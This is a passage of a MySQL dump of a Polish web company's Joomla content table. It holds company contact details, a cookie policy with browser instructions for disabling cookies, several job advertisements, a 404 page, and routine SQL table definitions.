Kapitał zakładowy 270.000,00PLN

\r\n

Rachunek Bankowy:

\r\n

Klient otrzymuje indywidualny numer konta bankowego,
widnieje on na fakturze.

\r\n

Biuro: czynne od poniedziałku do piątku od 8.00 do 16.00
telefon: 18 444 1 888, fax: 18 541 70 40

\r\n

','',1,0,0,2,'2011-10-14 09:36:40',42,'','2013-04-05 10:30:37',43,45,'2013-10-25 11:48:42','2011-10-14 09:36:40','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',18,0,4,'','',1,7718,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(7,39,'Internet','internet','','

Jedną z naszych wiodących usług jest usługa dostępu do internetu. Świadczymy ją zarówno klientom indywidualnym jak i firmom.

\r\n

Posiadamy różne prędkości internetu w zależności od potrzeb klientów. Dla firm możliwe jest również zestawienie łącza z indywidualnym ustawieniem prędkości pobierania i wysyłania danych.

\r\n

Więcej informacji można znaleźć na naszej stronie i24.pl

','',1,0,0,2,'2012-03-21 14:34:39',45,'','2012-03-21 14:39:03',45,0,'0000-00-00 00:00:00','2012-03-21 14:34:39','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,0,3,'','',1,14,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(8,40,'Nasza polityka Cookies','nasza-polityka-cookies','','

Polityka Webvisora dotycząca Ciasteczek

\r\n

 

\r\n

Niniejsza Polityka dotycząca Ciasteczek odnosi się do wszystkich stron internetowych oraz aplikacji na urządzenia mobilne, należących do Webvisor sp. zo.o. (Strony Webvisora): Webvisor.pl, wytowniastron.pl, i24.pl, imax.net.pl

\r\n


Przez używanie Stron Webvisora wyrażasz zgodę na używanie ciasteczek zgodnie z tą Polityką Ciasteczek. Jeżeli nie zgadzasz się na używanie przez nas ciasteczek, powinieneś zmienić ustawienia swojej przeglądarki w odpowiedni sposób lub zrezygnować z używania Stron Webvisora.

\r\n

 

\r\n

Co to są ciasteczka?

\r\n

 

\r\n

Ciasteczka (ang. cookies) to niewielkie pliki, zapisywane i przechowywane na twoim komputerze, tablecie lub smartphonie podczas gdy odwiedzasz różne strony w internecie. Ciasteczko zazwyczaj zawiera nazwę strony internetowej, z której pochodzi, „długość życia” ciasteczka (to znaczy czas jego istnienia), oraz przypadkowo wygenerowany unikalny numer służący do identyfikacji przeglądarki, z jakiej następuje połączenie ze stroną internetową.

\r\n

 

\r\n

 

\r\n

 

\r\n

Do czego używamy ciasteczek?

\r\n

 

\r\n

Webvisor używa ciasteczek w różnych celach:

\r\n\r\n

Używając ciasteczek w wyżej opisany sposób nigdy nie identyfikujemy tożsamości użytkowników na podstawie informacji przechowywanych w ciasteczkach.

\r\n

 

\r\n


Jak długo przechowywane są dane w ciasteczkach?

\r\n

 

\r\n

Na Stronach Webvisora mogą być używane dwa rodzaje ciasteczek – sesyjne oraz stałe. Te pierwsze pozostają na Twoim urządzeniu jedynie podczas korzystania ze Stron Webvisora. Ciasteczka stałe pozostają na Twoim urządzeniu tak długo jak długo mają ustawiony czas życia lub do momentu kiedy je usuniesz.

\r\n

 

\r\n

Rodzaje ciasteczek używanych na Stronach Webvisora

\r\n

 

\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
Typ Ciasteczka Do czego są wykorzystywane?
Konieczne do działania stronNiezbędne do prawidłowego funkcjonowania Stron Webvisora, pozwalają Ci na poruszanie się po nich oraz używanie ich elementów. Przykładowo mogą zapamiętywać poprzednie czynności (np. otwarte teksty) podczas wracania na stronę w tej samej sesji.
Poprawiające wydajnośćZbieranie informacji o tym jak odwiedzający korzystają ze Stron Webvisora poprzez dostarczanie informacji na temat obszarów które odwiedzają, czasu jaki na nich spędzają oraz problemów jakie na nich napotykają, jak np. komunikaty o błędach. To pozwala nam poprawiać działanie Stron Webvisora
Poprawiające funkcjonalnośćZapamiętywanie Twoich ustawień i wyborów (np. nazwa użytkownika, region, w którym jesteś, personalizowane ustawienia treści) by dostarczyć Ci bardziej spersonalizowane treści i usługi. Pozwalają Ci również na oglądanie filmów i używanie narzędzi społecznościowych, np. blogów, chatów i forów.
ReklamoweDostarczanie Ci reklam odpowiadających Twoim zainteresowaniom oraz ograniczanie liczby wyświetleń danej reklamy. Te ciasteczka pozwalają nam także mierzyć efektywność kampanii reklamowych.
\r\n

 

\r\n

 

\r\n

Czy używamy ciasteczek podmiotów trzecich?

\r\n

 

\r\n

Tak, korzystając ze Stron Webvisora możesz otrzymywać ciasteczka pochodzące od współpracujących z Webvisorem podmiotów trzecich takich jak np. Facebook, Google, Twitter, a także od firm realizujących na Stronach Webvisora kampanie reklamowe na zlecenie reklamodawców. Więcej informacji na temat tych ciasteczek możesz znaleźć na stronach internetowych poszczególnych podmiotów trzecich.

\r\n

 

\r\n


W jaki sposób mogę zmienić ustawienia dot. ciasteczek albo je usunąć?

\r\n

 

\r\n

Większość przeglądarek internetowych jest początkowo ustawionych na automatyczne przyjmowanie ciasteczek. Możesz jednak zmienić ustawienia przeglądarki tak, aby ciasteczka były blokowane – w całości lub w jakiejś części, np. tylko od stron trzecich, albo aby każdorazowo otrzymywać komunikat w momencie kiedy ciasteczka są wysyłane na Twoje urządzenie. Pamiętaj jednak, że jeżeli zablokujesz używane przez nas ciasteczka, może to negatywnie wpłynąć na wygodę korzystania ze Stron Webvisora, na przykład możesz nie być w stanie odwiedzić pewnych obszarów Stron Webvisora bądź nie otrzymywać spersonalizowanych informacji podczas ich przeglądania. Uniemożliwisz nam także zbieranie anonimowych informacji nt. używania naszych stron w celu stałego poprawiania zawartości Stron i usług Webvisora.
Aby dowiedzieć się jak możesz wyłączyć pliki cookies, kliknij ten link.

','',1,0,0,2,'2013-03-25 14:26:53',45,'','2013-04-18 10:03:59',45,0,'0000-00-00 00:00:00','2013-03-25 14:26:53','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,0,2,'','',1,4337,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(9,41,'Jak wyłączyć cookies?','jak-wylaczyc-cookies','','

Aby wyłączyć obsługę ciasteczek (cookies) w przeglądarce należy wykonać opisane poniżej czynności z uwzględnieniem używanej przeglądarki:



Google Chrome:

W prawym górnym rogu klikamy w symbol ustawień





W otwartym menu wybieramy opcję „Ustawienia”. W otwartym oknie na samym dole będzie przycisk „Pokaż ustawienia zaawansowane”. Wówczas pojawi się kilka dodatkowych pozycji. Klikamy w link „Ustawienia treści” w polu „Prywatność”.






W otwartym nowym oknie wybieramy opcję „Blokuj próby umieszczania na komputerze danych z witryn”.




Możemy też wcisnąć przycisk „Wszystkie pliki cookie i dane witryn” i w otwartym oknie kliknąć „Usuń wszystkie” – to usunie wszystkie dotychczas zapisane na komputerze pliki cookies.



Można też zablokować obsługę ciasteczek na określonej witrynie. W tym celu w powyżej przedstawionym zrzucie ekranu pozostawiamy zaznaczoną opcję „Zezwalaj na przechowywanie danych lokalnie (zalecane)”, ale klikamy w przycisk „Zarządzaj wyjątkami”. W nowo otwartym oknie wpisujemy kluczową część adresu witryny (np. „adreswitryny” dla „adreswitryny.com”) i wybieramy opcję „blokuj”, po czym klikamy przycisk gotowe.









Microsoft Internet Explorer

W najnowszych odsłonach przeglądarki Microsoft Internet Explorer domyślnie schowany jest pasek menu. Aby go otworzyć należy wcisnąć lewy klawisz Alt lub F10 i wybieramy z menu opcję „Narzędzia”, a z otwartego menu ostatnią pozycję „Opcje internetowe”:







Po zatwierdzeniu w otwartym oknie wybieramy zakładkę „Prywatność”, a później klikamy w przycisk „Zaawansowane”.





W otwartym okienku zaznaczamy wszystkie opcje tak jak zostało to pokazane na poniższym zrzucie ekranu:





Można też wykasować wszystkie dotychczas zapisane dane witryn. W tym celu w otwartym wcześniej oknie „Ustawienia internetowe” klikamy w zakładkę „Ogólne” i tam wybieramy opcję „Usuń” wskazaną na poniższym zrzucie ekranu:





W nowo otwartym oknie zaznaczamy opcje tak jak na poniżej przedstawiono i klikamy w „Usuń”.





Zaznaczona opcja „Zachowaj dane ulubionych witryn sieci Web” pozwala na zachowanie danych witryn, które mamy wpisane w zakładce „Ulubione”. Jeśli jej nie odznaczymy ciasteczka nie zostaną usunięte ze wszystkich witryn.



Mozilla Firefox

W najnowszych odsłonach przeglądarki Mozilla Firefox domyślnie schowany jest pasek menu. Aby go otworzyć należy wcisnąć lewy klawisz Alt lub F10 i wybieramy z menu pozycję „Narzędzia”, a tam „Opcje”:





W otwartym oknie wybieramy zakładkę „Prywatność”, tak jak zostało to pokazane poniżej:





W tym oknie zmieniamy opcje widoczną pod nazwą „Program Firefox:” którą zmieniamy na „będzie używał ustawień użytkownika”:





Nieco niżej odznaczamy opcję „Akceptuj ciasteczka”. Po tych zabiegach klikamy w przycisk OK.


Możemy też pozostawić włączoną opcję „Akceptuj ciasteczka” ale zablokować je na konkretnej witrynie. W tym celu Klikamy w przycisk „Wyjątki” widoczny na powyższym zrzucie ekranu i w nowo otwartym oknie uzupełniamy adres witryny i klikamy w przycisk „Blokuj”.





Można też wyczyścić wszystkie dotychczas zgromadzone ciasteczka. W tym celu w głównym menu (po wciśnięciu F10 lub lewego klawisza Alt) wybieramy ponownie „Narzędzia”, a tam „Wyczyść historię przeglądania”.





W nowo otwartym oknie wybieramy „wszystko” w polu „Okres do wyczyszczenia” oraz zaznaczamy opcję „Ciasteczka” odznaczając pozostałe pola, tak jak na poniższym zrzucie ekranu:






Wybór zatwierdzamy przyciskiem „OK”.



Opera

W przeglądarce Opera klikamy w przycisk „Opera” znajdujący się w lewym górnym rogu okna przeglądarki lub wciskamy lewy klawisz Alt. W otwartym menu wybieramy opcję „Ustawienia”, a później „Preferencje…”





W nowo otwartym oknie wybieramy zakładkę „Zaawansowane”, a później z listy zamieszczone w lewej części okna wybieramy „Ciasteczka”. Powinniśmy zobaczyć takie oto opcje:





Zaznaczamy opcję „Nigdy nie akceptuj ciasteczek” i klikamy w przycisk „OK”.





Możemy też wyczyścić wszystkie dotychczas zebrane ciasteczka wybierając opcję „Zarządzaj ciasteczkami” w powyżej zamieszczonym zrzucie ekranu. W nowo otwartym oknie należy konsekwentnie klikać w przycisk „Usuń” dla każdej pozycji.

','',1,0,0,2,'2013-03-25 14:28:12',45,'','2013-03-25 14:28:25',45,43,'2014-01-20 12:05:43','2013-03-25 14:28:12','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,0,1,'','',1,6229,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(10,43,'Frontend Developer','frontend-developer','','

Na początku zaczniemy od tego czego od Ciebie oczekujemy:

\r\n
    \r\n
  1. Umiejętność tworzenia szablonów z wykorzystaniem technologii: \r\n\r\n
  2. \r\n
  3. Znajomość CMS-a WordPress OR Joomla
  4. \r\n
\r\n

 

\r\n

Jaki zakres obowiązków przygotowaliśmy?

\r\n
    \r\n
  1. Tworzenie szablonów stron w technologi: \r\n\r\n
  2. \r\n
  3. Optymalizacja stron pod kontem SEO
  4. \r\n
  5. Instalowanie i konfiguracja WordPress OR Joomla
  6. \r\n
\r\n

 

\r\n

Czym możesz nas zaskoczyć i zaplusować?

\r\n
    \r\n
  1. Znajomością zagadnień związanych z SEO (optymalizacja kodu, techniki
    pozycjonowania)
  2. \r\n
  3. Znajomością PHP i MySQL
  4. \r\n
  5. Umiejętnością tworzenia szablonów pod WordPress OR Joomla
  6. \r\n
  7. Kreatywnością
  8. \r\n
  9. Własnym portfolio
  10. \r\n
\r\n

 

\r\n

Co my możemy dać Tobie w zamian?

\r\n

Pozwolimy Ci wykazać się Twoim kunsztem w posługiwaniu się HTML-em i CSS-em, oraz jQuer-ym. Przy czym stawiamy sobie za cel: Jeżeli można coś osiągnąć za pomocą HTML-a i CSS-a to osiągniemy to, a nawet więcej.
Pozwolimy Ci rozwijać swoją pasję tworzenia stron, krojenia znaczników i doprawiania ich stylami. A najlepsze w tym wszystkim jest to, że jeszcze zapłacimy Ci za to!

\r\n

Jeżeli nie obawiasz się poznać wielu nowych technik i styli w tym tych dotyczących pracy Webdevelopera to napisz nam jakieś in(CV)fo o sobie.

\r\n

Pamiętaj tylko odważni i waleczni będą mieli możliwość pójścia z nami ramię w ramię aby podbić... No to to by było na tyle,
do zobaczenia na rozmowie kwalifikacyjnej!

\r\n

Prosimy o zamieszczenie klauzuli: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji (zgodnie z Ustawą z dnia 29.08.1997 roku o Ochronie Danych Osobowych; tekst jednolity: Dz. U. z 2002r. Nr 101, poz. 926 ze zm.).”

\r\n

Uprzejmie informujemy, iż zastrzegamy sobie prawo kontaktu jedynie z wybranymi osobami.

','',1,0,0,8,'2013-04-23 12:33:01',45,'','2013-05-23 12:43:04',45,0,'0000-00-00 00:00:00','2013-04-23 12:33:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',7,0,4,'','',1,1647,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(11,44,'Programista PHP','programista-php','','

Na początku zaczniemy od tego czego od Ciebie oczekujemy:

\r\n
    \r\n
  1. Umiejętność pisania w PHP kodu:
    \r\n\r\n
  2. \r\n
  3. Znajomość SQL (baza MySQL to podstawa)
  4. \r\n
\r\n

 

\r\n

Jaki zakres obowiązków przygotowaliśmy?

\r\n
    \r\n
  1. Pisanie właśnie takiego kodu: \r\n\r\n
  2. \r\n
  3. Pisanie dodatków do popularnych CMS-ów (WordPress OR Joomla), a także naszego własnego
  4. \r\n
\r\n

 

\r\n

Czym możesz nas zaskoczyć i zaplusować?

\r\n
    \r\n
  1. Znajomością frameworków: Zend OR Symfony ( OR innych )
  2. \r\n
  3. Znajomością jQuery, Flash i innych technologii webowych
  4. \r\n
  5. Znajomością CMS-ów WordPress OR Joomla
  6. \r\n
  7. Umiejętnością pisania dodatków do powyższych CMS-ów
  8. \r\n
  9. Kreatywnością
  10. \r\n
  11. Własnym portfolio
  12. \r\n
\r\n

 

\r\n

Co my możemy dać Tobie w zamian?

\r\n

Na pewno dużo powodów do pisania zawiłego i pokrętnego kodu, który będziesz musiał czytać ze słownikiem w ręku. Ciągle pozyskujemy nowych klientów, którzy stawiają przed nami nowe wymagania, dlatego nie będziesz się z nami nudził.
Damy Ci możliwość rozwijania pasji jaką niewątpliwie jest programowanie, a na dodatek zapłacimy Ci za to co lubisz robić.

\r\n

Jeżeli jesteś zainteresowany pracą w zespole, który nie boi się żadnego zadania to napisz nam jakieś in(CV)fo o sobie.
Do zobaczenia na rozmowie kwalifikacyjnej!

\r\n

Prosimy o zamieszczenie klauzuli: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji (zgodnie z Ustawą z dnia 29.08.1997 roku o Ochronie Danych Osobowych; tekst jednolity: Dz. U. z 2002r. Nr 101, poz. 926 ze zm.).”

\r\n

Uprzejmie informujemy, iż zastrzegamy sobie prawo kontaktu jedynie z wybranymi osobami.

','',1,0,0,8,'2013-04-23 12:33:01',45,'','2013-05-23 12:43:36',45,0,'0000-00-00 00:00:00','2013-04-23 12:33:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',4,0,3,'','',1,1352,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(12,45,'Grafik WWW','grafik-www','','

Na początku zaczniemy od tego czego od Ciebie oczekujemy:

\r\n
    \r\n
  1. Umiejętność tworzenia:
    \r\n\r\n
  2. \r\n
  3. Kreatywności
  4. \r\n
  5. Umiejętności \"czytania klientom w myślach\" i tworzenia takich projektów jakich oczekują, nie koniecznie takich jakie są ładne ;)
  6. \r\n
\r\n

 

\r\n

Jaki zakres obowiązków przygotowaliśmy?

\r\n
    \r\n
  1. Dokładnie to co jest Twoją pasją i za interesowaniem i o czym już wspomnieliśmy:
    \r\n\r\n
  2. \r\n
  3. Optymalizowanie projektów pod kontem SEO
  4. \r\n
  5. Wyszukiwanie grafik i pomysłów w internecie i nie tylko
  6. \r\n
\r\n

 

\r\n

Czym możesz nas zaskoczyć i zaplusować?

\r\n
    \r\n
  1. Znajomością zagadnień związanych z SEO (optymalizacja kodu, techniki
    pozycjonowania)
  2. \r\n
  3. Znajomością Flash
  4. \r\n
  5. Umiejętnością tworzenia szablonów pod WordPress OR Joomla
  6. \r\n
  7. Znajomością narzędzi i umiejętnościami do tworzenia plików pod druk
  8. \r\n
  9. Znajomością narzędzi i technik związanych z grafiką 3D OR tworzenia filmów
  10. \r\n
  11. Własnym portfolio
  12. \r\n
\r\n

 

\r\n

Co my możemy dać Tobie w zamian?

\r\n

Pozwolimy Ci wykazać się Twoim kunsztem i umiejętnościami związanymi z tworzeniem grafiki pod WWW. Niewątpliwie jest to sztuka, a ty jako artysta będziesz mógł wypłynąć na szerokie wody internetu pod naszą banderą.
Pozwolimy Ci rozwijać swoją pasję projektowania stron i innych niezbędnych w życiu codziennym dobrodziejstw internetu. A najlepsze w tym wszystkim jest to, że jeszcze zapłacimy Ci za to!

\r\n

Jeżeli nie obawiasz się pracować w naszym środowisku ludzi z WebPsychiką  to napisz nam jakieś in(CV)fo o sobie.

\r\n

Pamiętaj zaskocz nas, a wygrasz,
do zobaczenia na rozmowie kwalifikacyjnej!

\r\n

Prosimy o zamieszczenie klauzuli: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji (zgodnie z Ustawą z dnia 29.08.1997 roku o Ochronie Danych Osobowych; tekst jednolity: Dz. U. z 2002r. Nr 101, poz. 926 ze zm.).”

\r\n

Uprzejmie informujemy, iż zastrzegamy sobie prawo kontaktu jedynie z wybranymi osobami.

','',1,0,0,8,'2013-04-23 12:33:01',45,'','2013-07-24 07:37:18',45,0,'0000-00-00 00:00:00','2013-04-23 12:33:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',5,0,2,'','',1,1892,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(13,46,'Specjalista od Marketingu Internetowego','specjalista-od-marketingu-internetowego','','

Na początku zaczniemy od tego czego od Ciebie oczekujemy:

\r\n
    \r\n
  1. Znajomości zagadnień związanych z Marketingiem Internetowym: \r\n\r\n
  2. \r\n
  3. Znajomości zagadnień związanych z SEO:
    \r\n\r\n
  4. \r\n
  5. Kreatywności
  6. \r\n
  7. Umiejętności tworzenia tekstów pod SEO i PR
  8. \r\n

    Prosimy o zamieszczenie klauzuli: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji (zgodnie z Ustawą z dnia 29.08.1997 roku o Ochronie Danych Osobowych; tekst jednolity: Dz. U. z 2002r. Nr 101, poz. 926 ze zm.).”

    \r\n

    Uprzejmie informujemy, iż zastrzegamy sobie prawo kontaktu jedynie z wybranymi osobami.

    \r\n
\r\n

 

\r\n

Jaki zakres obowiązków przygotowaliśmy?

\r\n
    \r\n
  1. Dokładnie to o czym już wspomnieliśmy, czyli to na czym się znasz
    \r\n\r\n
  2. \r\n
  3. Pomoc w optymalizowaniu projektów i gotowego kodu pod kontem SEO i PR
  4. \r\n
\r\n

 

\r\n

Czym możesz nas zaskoczyć i zaplusować?

\r\n
    \r\n
  1. Znajomością zagadnień związanych z produktami/usługami google (AdWords, Analitycs)
  2. \r\n
  3. Doświadczeniem w prowadzeniu kampanii reklamowych
  4. \r\n
  5. Własnym blogiem poświęconym podobnej tematyce
  6. \r\n
\r\n

 

\r\n

Co my możemy dać Tobie w zamian?

\r\n

Pozwolimy Ci wykazać się Twoim kunsztem i umiejętnościami związanymi z kreowaniem wizerunku i promowaniu klientów ich stron i usług. A najlepsze w tym wszystkim jest to, że jeszcze zapłacimy Ci za to!

\r\n

Jeżeli nie obawiasz się pracować w naszym środowisku ludzi z WebPsychikom  to napisz nam jakieś in(CV)fo o sobie.

\r\n

Pamiętaj zaskocz nas, a wygrasz,
do zobaczenia na rozmowie kwalifikacyjnej!

\r\n

 

','',1,0,0,8,'2013-04-23 12:33:01',45,'','2013-05-23 12:43:59',45,0,'0000-00-00 00:00:00','2013-04-23 12:33:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,0,1,'','',1,1429,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(14,47,'Project Menager','project-menager','','

Na początku zaczniemy od tego czego od Ciebie oczekujemy:

\r\n
    \r\n
  1. Wykształcenie wyższe
  2. \r\n
  3. Dobra znajomość rynku branży internetowej (strony www, marketing internetowy, aplikacje mobilne, itp)
  4. \r\n
  5. Podstawowa wiedza techniczna umożliwiająca zaproponowanie klientowi rozwiązania zgodnego z jego oczekiwaniami
  6. \r\n
  7. Dobra komunikatywność
  8. \r\n
  9. Zdolność prezentacji produktów i negocjacji cen
  10. \r\n
  11. Umiejętność nawiązywania i utrzymywania kontaktów
  12. \r\n
  13. Znajomość technik sprzedaży
  14. \r\n
  15. Gotowość do podnoszenia kwalifikacji
  16. \r\n
  17. Gotowość do wyjazdów
  18. \r\n
\r\n

 

\r\n

Jaki zakres obowiązków przygotowaliśmy?

\r\n
    \r\n
  1. Głównie sprzedaż produktów, które jeszcze nie istnieją,
  2. \r\n
  3. Sprzedaż już posiadanych produktów i usług: streamingu, sklepów, pozycjonowania, itp.,
  4. \r\n
  5. Pozyskiwanie klientów i utrzymywanie kontaktów z nimi,
  6. \r\n
  7. Zaangażowania w rozwój \r\n\r\n
  8. \r\n
\r\n

 

\r\n

Czym możesz nas zaskoczyć i zaplusować?

\r\n
    \r\n
  1. Doświadczeniem na podobnym stanowisku.
  2. \r\n
  3. Wiedzą informatyczną i techniczną na wysokim poziomie.
  4. \r\n
  5. Bazą własnych klientów, którym będziesz mógł zaoferować nasze usługi.
  6. \r\n
\r\n

 

\r\n

Co my możemy dać Tobie w zamian?

\r\n

Będziesz miał okazję pracować z ludźmi nastawionymi na sukces firmy jak i swój własny, jeśli firma odnosi sukces to każdy z nas go odnosi.
Pozwolimy Ci rozwijać swoje umiejętności i podnosić kwalifikacje, dzięki czemu będziesz dla nas jeszcze cenniejszym pracownikiem. A najlepsze w tym wszystkim jest to, że jeszcze zapłacimy Ci za to!

\r\n

Jeżeli nie obawiasz się pracować w naszym środowisku ludzi z WebPsychikom  to napisz nam jakieś in(CV)fo o sobie.

\r\n

Pamiętaj zaskocz nas, a wygrasz,
do zobaczenia na rozmowie kwalifikacyjnej!

\r\n

Prosimy o zamieszczenie klauzuli: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji (zgodnie z Ustawą z dnia 29.08.1997 roku o Ochronie Danych Osobowych; tekst jednolity: Dz. U. z 2002r. Nr 101, poz. 926 ze zm.).”

\r\n

Uprzejmie informujemy, iż zastrzegamy sobie prawo kontaktu jedynie z wybranymi osobami.

','',0,0,0,8,'2013-04-23 12:33:01',45,'','2013-05-23 12:44:15',45,0,'0000-00-00 00:00:00','2013-04-23 12:33:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',5,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(15,48,'Error 404','error-404','','

Hm... coś poszło nie tak :/

\r\n

Czy jesteś pewien/pewna, że adres podstrony jest poprawny?

\r\n

Może spróbujesz jednego z linków z górnego menu.

','',1,0,0,2,'2013-09-24 09:42:12',45,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-09-24 09:42:12','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',1,0,0,'','',1,1922,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''); /*!40000 ALTER TABLE `jos_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content_frontpage` -- DROP TABLE IF EXISTS `jos_content_frontpage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content_frontpage` ( `content_id` int(11) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content_frontpage` -- 